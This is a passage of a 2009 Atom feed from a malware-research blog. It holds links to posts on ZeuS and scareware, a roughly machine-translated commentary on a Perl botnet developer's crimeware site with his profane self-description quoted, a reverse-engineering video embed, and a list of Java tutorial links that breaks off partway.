href="http://mipistus.blogspot.com/2009/10/zeus-botnet-y-su-poder-de-reclutamiento.html"&gt;ZeuS Botnet y su poder de reclutamiento zombi&lt;/a&gt;&lt;br /&gt;19.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/pornografia-excusa-perfecta-para-la.html"&gt;Pornografía. Excusa perfecta para la propagación de malware II&lt;/a&gt;&lt;br /&gt;19.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/malware-intelligence-linkedin-group.html"&gt;Malware Intelligence Linkedin Group&lt;/a&gt;&lt;br /&gt;18.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/panorama-actual-del-negocio-originado.html"&gt;Panorama actual del negocio originado por crimeware&lt;/a&gt;&lt;br /&gt;17.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/zeus-spam-y-certificados-ssl.html"&gt;ZeuS, spam y certificados SSL&lt;/a&gt;&lt;br /&gt;14.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/ddbot-mas-gestion-de-botnets-via-web.html"&gt;DDBot. Más gestión de botnets vía web&lt;/a&gt;&lt;br /&gt;13.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/una-recorrida-por-los-ultimos-scareware.html"&gt;Una recorrida por los últimos scareware XVI&lt;/a&gt;&lt;br /&gt;08.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/nivel-de-inmadurez-en-materia-de.html"&gt;Nivel de (in)madurez en materia de prevención&lt;/a&gt;&lt;br /&gt;04.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/automatizacion-en-la-creacion-de.html"&gt;Automatización en la creación de exploits&lt;/a&gt;&lt;br /&gt;01.10.09 &lt;a href="http://mipistus.blogspot.com/2009/10/rompiendo-el-esquema-convencional-de.html"&gt;Rompiendo el esquema convencional de infección&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Evil Fingers Blog&lt;/span&gt;&lt;br /&gt;27.10.09 &lt;a href="http://evilfingers.blogspot.com/2009/10/zeus-and-power-botnet-zombie.html"&gt;ZeuS and power Botnet zombie recruitment&lt;/a&gt;&lt;br /&gt;18.10.09 &lt;a href="http://evilfingers.blogspot.com/2009/10/current-business-outlook-caused-by.html"&gt;Current business outlook caused by crimeware&lt;/a&gt;&lt;br /&gt;17.10.09 &lt;a href="http://evilfingers.blogspot.com/2009/10/recent-tour-of-scareware-xvi.html"&gt;A recent tour of scareware XVI&lt;/a&gt;&lt;br /&gt;10.10.09 &lt;a href="http://evilfingers.blogspot.com/2009/10/level-of-immaturity-in-prevention.html"&gt;Level of (im)maturity in prevention&lt;/a&gt;&lt;br /&gt;09.10.09 &lt;a href="http://evilfingers.blogspot.com/2009/10/automation-in-creating-exploits.html"&gt;Automation in creating exploits&lt;/a&gt;&lt;br /&gt;05.10.09 &lt;a href="http://evilfingers.blogspot.com/2009/10/breaking-conventional-scheme-of.html"&gt;Breaking the conventional scheme of infection&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;ESET Latinoamérica Blog&lt;/span&gt;&lt;br /&gt;31.10.09 &lt;a href="http://blogs.eset-la.com/laboratorio/2009/10/31/reporte-amenazas-octubre-2009/"&gt;Reporte de amenazas de octubre&lt;/a&gt;&lt;br /&gt;28.10.09 &lt;a href="http://blogs.eset-la.com/laboratorio/2009/10/28/propagacion-zeus-falsa-actualizacion-microsoft/"&gt;Propagación de ZeuS a través de falsa actualización de Microsoft&lt;/a&gt;&lt;br /&gt;26.10.09 &lt;a href="http://blogs.eset-la.com/laboratorio/2009/10/26/gira-seguridad-antivirus-ahora-venezuela/"&gt;Gira Seguridad Antivirus. Ahora, en Venezuela&lt;/a&gt;&lt;br /&gt;21.10.09 &lt;a href="http://blogs.eset-la.com/laboratorio/2009/10/21/constructores-exploits-actividades-dummies/"&gt;Constructores de exploits. Más actividades for dummies&lt;/a&gt;&lt;br /&gt;15.10.09 &lt;a href="http://blogs.eset-la.com/laboratorio/2009/10/15/nueva-edicion-de-nuestro-curso-de-seguridad-antivirus/"&gt;Nueva edición de nuestro Curso de Seguridad Antivirus&lt;/a&gt;&lt;br /&gt;13.10.09 &lt;a href="http://blogs.eset-la.com/laboratorio/2009/10/13/variante-adware-recompensa/"&gt;Nueva variante de Adware pide recompensa&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-4531263799856919122?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/4531263799856919122/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=4531263799856919122' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4531263799856919122'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4531263799856919122'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/compendio-mensual-de-informacion.html' title='Compendio mensual de información. Octubre 2009'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8339941808707314835</id><published>2009-11-13T16:19:00.001-11:00</published><updated>2009-11-13T16:20:55.651-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='Quad System'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>Open Source Development Botnets. "My last words?</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="display: inline;" title="Quienes leyeron el post sobre el proyecto crimeware denominado  Quad System,  recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de  botnets , tanto para plataformas Windows como para plataformas GNU/Linux."&gt;Those who read the post about the project called crimeware &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Quienes leyeron el post sobre el proyecto crimeware denominado  Quad System,  recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de  botnets , tanto para plataformas Windows como para plataformas GNU/Linux."&gt;Quad System,&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Quienes leyeron el post sobre el proyecto crimeware denominado  Quad System,  recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de  botnets , tanto para plataformas Windows como para plataformas GNU/Linux."&gt; recall that between paragraphs said not knowing the cost of private version of this application for the control of &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Quienes leyeron el post sobre el proyecto crimeware denominado  Quad System,  recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de  botnets , tanto para plataformas Windows como para plataformas GNU/Linux."&gt;botnets, for Windows platforms to GNU/Linux platforms.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Quienes leyeron el post sobre el proyecto crimeware denominado  Quad System,  recordarán que entre sus párrafos comentaba no conocer el costo de la versión privada de esta aplicación destinada al control de  botnets , tanto para plataformas Windows como para plataformas GNU/Linux."&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="El tema es que… por cosas de la vida misma… el desarrollador de estos particulares proyectos diseñados en Perl, llamado  cross , había terminado con sus hazañas censurándose a sí mismo con el cierre de su sitio web; manifestando, a través del mismo, las motivaciones que llevaron a su  &amp;quot;violenta&amp;quot; decisión, y las cuales muestro en la siguiente captura:"&gt;The thing is ... for things of life itself ... the developer of these particular projects designed in Perl, called &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="El tema es que… por cosas de la vida misma… el desarrollador de estos particulares proyectos diseñados en Perl, llamado  cross , había terminado con sus hazañas censurándose a sí mismo con el cierre de su sitio web; manifestando, a través del mismo, las motivaciones que llevaron a su  &amp;quot;violenta&amp;quot; decisión, y las cuales muestro en la siguiente captura:"&gt;cross, &lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="El tema es que… por cosas de la vida misma… el desarrollador de estos particulares proyectos diseñados en Perl, llamado  cross , había terminado con sus hazañas censurándose a sí mismo con el cierre de su sitio web; manifestando, a través del mismo, las motivaciones que llevaron a su  &amp;quot;violenta&amp;quot; decisión, y las cuales muestro en la siguiente captura:"&gt;was finished with his exploits reproaching himself with the closure of its website; expressing, through it, the motivations that led to his "violent" decision, and which show in the following screen:&lt;/span&gt;&lt;span style="display: inline;" title="El tema es que… por cosas de la vida misma… el desarrollador de estos particulares proyectos diseñados en Perl, llamado  cross , había terminado con sus hazañas censurándose a sí mismo con el cierre de su sitio web; manifestando, a través del mismo, las motivaciones que llevaron a su  &amp;quot;violenta&amp;quot; decisión, y las cuales muestro en la siguiente captura:"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Su4zSxEO-OI/AAAAAAAAB6I/RS_vwy-Xcqg/s1600-h/mipistus-os-closed.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 56px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/Su4zSxEO-OI/AAAAAAAAB6I/RS_vwy-Xcqg/s400/mipistus-os-closed.png" alt="" id="BLOGGER_PHOTO_ID_5399309400765561058" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Sin embargo, luego de varios días  (de meditación quizás) , se decidió por volver a las andadas poniendo nuevamente a disposición  con fines educativos  un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware."&gt;However, after several days &lt;/span&gt;&lt;strike&gt;&lt;span style="display: inline;" title="Sin embargo, luego de varios días  (de meditación quizás) , se decidió por volver a las andadas poniendo nuevamente a disposición  con fines educativos  un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware."&gt;(perhaps&lt;/span&gt;&lt;/strike&gt;&lt;span style="display: inline;" title="Sin embargo, luego de varios días  (de meditación quizás) , se decidió por volver a las andadas poniendo nuevamente a disposición  con fines educativos  un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware."&gt;meditation), it was decided to return to your old tricks again making provision &lt;/span&gt;&lt;strike&gt;&lt;span style="display: inline;" title="Sin embargo, luego de varios días  (de meditación quizás) , se decidió por volver a las andadas poniendo nuevamente a disposición  con fines educativos  un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware."&gt;for teaching&lt;/span&gt;&lt;/strike&gt;&lt;span style="display: inline;" title="Sin embargo, luego de varios días  (de meditación quizás) , se decidió por volver a las andadas poniendo nuevamente a disposición  con fines educativos  un arsenal de aplicativos destinados al control de botnets, o lo que es sinónimo en la actualidad, crimeware."&gt; an array of applications for the control of botnets, or what is now synonymous, crimeware.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="display: inline;" title="La nueva interfaz de su web es la siguiente:"&gt;The new interface in their web is:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su4zMD_bHdI/AAAAAAAAB6A/EnsjkrOrehw/s1600-h/mipistus-cross-new-interfaz.png#googtrans%28es%7Cen%29"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 158px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Su4zMD_bHdI/AAAAAAAAB6A/EnsjkrOrehw/s400/mipistus-cross-new-interfaz.png" alt="" id="BLOGGER_PHOTO_ID_5399309285586574802" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Un dato curioso, que como el resto del post no guarda ninguna relación técnica con los aspectos de seguridad de la información, es la introducción al concepto de &amp;quot;Ironía&amp;quot; que plantea en el index  ¿será que se siente irónico con sus propuestas colaborativas en el ámbito delictivo?"&gt;A curious fact, that like the rest of the post is unrelated technical aspects of information security is the introduction to the concept of "irony" that arises in the index &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="Un dato curioso, que como el resto del post no guarda ninguna relación técnica con los aspectos de seguridad de la información, es la introducción al concepto de &amp;quot;Ironía&amp;quot; que plantea en el index  ¿será que se siente irónico con sus propuestas colaborativas en el ámbito delictivo?"&gt;is it ironic that feels its proposals in collaborative crime area?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="De todos modos, el chico aún parece enojado…  ¿con los profesionales de seguridad? ... ya que con interfaz nueva sigue escribe lo siguiente:"&gt;Anyway, the guy still seems angry ... &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="De todos modos, el chico aún parece enojado…  ¿con los profesionales de seguridad? ... ya que con interfaz nueva sigue escribe lo siguiente:"&gt;"with security professionals?&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="De todos modos, el chico aún parece enojado…  ¿con los profesionales de seguridad? ... ya que con interfaz nueva sigue escribe lo siguiente:"&gt;... new interface as follows writes:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="&amp;quot;…This site is dedicated to my projects and only my projects. Long time ago here you could find some more information, but currently, I don’t give a shit about providing any kind of information."&gt;"... This site is dedicated to my projects and only my projects. Long time ago here you could find some more information, but currently, I do not give a shit about Providing any kind of information.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Besides, well, WTF? xD Something about me: I am the only one who is keeping this site somehow online and alive, taking care of it well, not much to take care of. What you can find here: some useless shit - my small projects. Well, I know no one gives a fuck, me neither - I placed them here and here they are to stay, you like it or not. So, no fun in here :D"&gt;Besides, well, WTF? xD Something about me: I am the only one who is somehow keeping this site online and alive, taking care of it well, not much to take care of.&lt;/span&gt;&lt;/span&gt;  &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="Besides, well, WTF? xD Something about me: I am the only one who is keeping this site somehow online and alive, taking care of it well, not much to take care of. What you can find here: some useless shit - my small projects. Well, I know no one gives a fuck, me neither - I placed them here and here they are to stay, you like it or not. So, no fun in here :D"&gt;What you can find here: some useless shit - my small projects. Well, I know no one gives a fuck, me neither - I place them here and here they are to stay, you like it or not. So, no fun in here: D&lt;/span&gt;&lt;/span&gt;  &lt;span style="font-style: italic;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Fuck… and who is that idiot founded this fucked up god forsaken piece of shit? xD LULZ and LOL xD As you can see I keep my head up and travel through life with a smile on my damn bitching face and ain't giving a fuck, man."&gt;Fuck ... and who is that idiot found this fucked up god forsaken piece of shit? LULZ xD and LOL xD As you can see I keep my head up and travel through life with a smile on my face and damn bitching is not giving a fuck, man.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="So you'll ask what a damn morron should be of me, starting with such introduction? Well, I'm the man, say, cross is in the house babe xD Anyways, just fuck it. You got here my projects; I will put some new here too. Like once in a year. Blah...Some new papers maybe if I will have some good mood for writing or i will be drunk as hell to believe in it. Hah...Whatevah...&amp;quot;"&gt;So you'll ask what a damn pepper should be of me, starting with such introduction? Well, I'm the man, say, cross is in the house babe xD&lt;/span&gt;&lt;/span&gt;  &lt;span style="font-style: italic;"&gt;&lt;span style="display: inline;" title="So you'll ask what a damn morron should be of me, starting with such introduction? Well, I'm the man, say, cross is in the house babe xD Anyways, just fuck it. You got here my projects; I will put some new here too. Like once in a year. Blah...Some new papers maybe if I will have some good mood for writing or i will be drunk as hell to believe in it. Hah...Whatevah...&amp;quot;"&gt;Anyways, just fuck it. You got here my projects, I will put some new here too. Like once in a year. Some new papers Blah ... maybe if I will have some good mood for writing or I will be drunk as hell to believe in it. Hah ... Whatevah ... "&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="A pesar de todo esto, este &amp;quot;sutil&amp;quot; personaje, aparentemente empedernido programador en Perl, posee algunas cosas interesantes como una GUI para Nikto :-)"&gt;Despite that, this "subtle" character, apparently hardened Perl programmer, has some interesting things like a GUI for Nikto :-)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Información relacionada"&gt;Related information&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/11/quadnt-system-sistema-de-administracion.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="QuadNT System. Sistema de administración de zombis I (Windows)"&gt;QuadNT System. Zombies Management System I (Windows)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/hybrid-botnet-control-system-desarrollo.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Hybrid Botnet Control System. Desarrollo de http bot en perl"&gt;Botnet Hybrid Control System. Http Development bot in perl&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/desarrollo-de-crimeware-open-source.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="Desarrollo de crimeware Open Source para (...) administrar botnets"&gt;Open Source Development crimeware to manage botnets (...)&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/triad-botnet-iii-administracion-remota.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="TRiAD Botnet III. Administración remota de zombis multi..."&gt;TRIAD Botnet III. Remote administration of multi zombies ...&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/triad-botnet-ii-administracion-remota.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="TRiAD Botnet II. Administración remota de zombis multi..."&gt;TRIAD Botnet II. Remote administration of multi zombies ...&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/triad-botnet-administracion-remota-de.html#googtrans%28es%7Cen%29"&gt;&lt;span style="display: inline;" title="TRiAD Botnet. Administración remota de zombis en Linux"&gt;TRIAD Botnet. Remote administration of Linux zombies&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8339941808707314835?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8339941808707314835/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8339941808707314835' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8339941808707314835'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8339941808707314835'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/open-source-development-botnets-my-last.html' title='Open Source Development Botnets. &quot;My last words?'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Ppq0fEGkHo4/Su4zSxEO-OI/AAAAAAAAB6I/RS_vwy-Xcqg/s72-c/mipistus-os-closed.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-6205468571446509237</id><published>2009-11-12T18:23:00.000-11:00</published><updated>2009-11-12T18:24:58.700-11:00</updated><title type='text'>Reverse engineering techniques to find security bugs: A...</title><content type='html'>Google research discussion on Reverse engineering techniques to find security bugs:&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/mwrhRP2PswA&amp;hl=en_US&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/mwrhRP2PswA&amp;hl=en_US&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;- EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-6205468571446509237?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/6205468571446509237/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=6205468571446509237' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6205468571446509237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/6205468571446509237'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/reverse-engineering-techniques-to-find.html' title='Reverse engineering techniques to find security bugs: A...'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-2410456130813069938</id><published>2009-11-12T15:05:00.000-11:00</published><updated>2009-11-12T15:06:02.123-11:00</updated><title type='text'>Java Programming</title><content type='html'>When searching for Java Dev videos, I found the following videos once again by Bucky from thenewboston. There are 86 videos so far, guess he is making more in the process...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Hl-zzrqQoSE"&gt;Java Programming Tutorial - 1 - Installing the JDK&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=5u8rFbpdvds"&gt;Java Programming Tutorial - 2 - Running a Java Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=CE8UIbb_4iM"&gt;Java Programming Tutorial - 3 - Downloading Eclipse&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=SHIT5VkNrCg"&gt;Java Programming Tutorial - 4 - Hello YouTube&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=gtQJXzi3Yns"&gt;Java Programming Tutorial - 5 - Variables&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=5DdacOkrTgo"&gt;Java Programming Tutorial - 6 - Getting User Input&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ANuuSFY2BbY"&gt;Java Programming Tutorial - 7 - Building a Basic Calculator&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=8ZaTSedtf9M"&gt;Java Programming Tutorial - 8 - Math Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ydcTx6idTs0"&gt;Java Programming Tutorial - 9 - Increment Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=iMeaovDbgkQ"&gt;Java Programming Tutorial - 10 - If Statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=PAaqgTr7Cx4"&gt;Java Programming Tutorial - 11 - Logical Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=RVRPmeccFT0"&gt;Java Programming Tutorial - 12 - Switch Statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=8ZuWD2CBjgs"&gt; Java Programming Tutorial - 13 - While Loop&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=XqTg2buXS5o"&gt;Java Programming Tutorial - 14 - Using Multiple Classes&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=7MBgaF8wXls"&gt;Java Programming Tutorial - 15 - Use Methods with Parameters&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=9t78g0U8VyQ"&gt;Java Programming Tutorial - 16 - Many Methods and Instances&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=tPFuVRbUTwA"&gt;Java Programming Tutorial - 17 - Constructors&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Y4xFGCyt1ww"&gt;Java Programming Tutorial - 18 - Nested if Statements&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=C0YRYVn_BeI"&gt;Java Programming Tutorial - 19 - else if Statement&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=Y6NheSwTsDs"&gt;Java Programming Tutorial - 20 - Conditional Operators&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=KXuQQh6AynQ"&gt;Java Programming Tutorial - 21 - Simple Averaging Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=rjkYAs6gAkk"&gt;Java Programming Tutorial - 22 - for Loops&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=T9TcAm9g0mo"&gt;Java Programming Tutorial - 23 - Compound Interest Program&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=nfr52iR0Pyg"&gt;Java Programming Tutorial - 24 - do while Loops&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=JzMdepMLW44"&gt;Java Programming Tutorial - 25 - Math Class Methods&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=AhwIYAXPASw"&gt;Java Programming Tutorial - 26 - Random Number Generator&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=L06uGnF4IpY"&gt;Java Programming Tutorial - 27 - Introduction to Arrays&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=nTF-RcgsV0E"&gt;Java Programming Tutorial - 28 - Creating an Array Table&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=etyrkipdKvc"&gt;Java Programming Tutorial - 29 - Summing Elements of Arrays&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=pHxtKDENDdE"&gt;Java Programming Tutorial - 30 - Array Elements as Counters&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=w41D0V-BnKQ"&gt;Java Programming Tutorial - 31 - Enhanced for Loop&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=rzXoz2KOP7E"&gt;Java Programming Tutorial - 32 - Arrays in Methods&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ctab5xPv-Vk"&gt;Java Programming Tutorial - 33 - Multidimensional Arrays&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=hbot9MQVHOM"&gt;Java Programming Tutorial - 34 - Table for Multi Arrays&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=BFL1oWnEO2k"&gt;Java Programming Tutorial - 35 - Variable Length Arguments&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=o4Or0PMI_aI"&gt;Java Programming Tutorial - 36 - Time Class&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=E0BTAqIltFc"&gt;Java Programming Tutorial - 37 - Display Regular time&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=csjfLTt6-io"&gt;Java Programming Tutorial - 38 - Public, Private and this&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=LS7BzkBzn3Y"&gt;Java Programming Tutorial - 39 - Multiple Constructors&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=eqP5X6APc5w"&gt;Java Programming Tutorial - 40 - Set and Get Methods&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=MK2SMJZbUmU"&gt;Java Programming Tutorial - 41 - Building Objects for Constructors&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=l0N6WvIVoUI"&gt;Java Programming Tutorial - 42 - toString&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=ZBkyPA6NZR8"&gt;Java Programming Tutorial - 43 - Composition&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.youtube.com/watch?v=uFGrL5vyp54"&gt;Java Programming Tutorial - 44 - Enumeration&lt;/a&gt;&lt;br /&gt;&lt;a 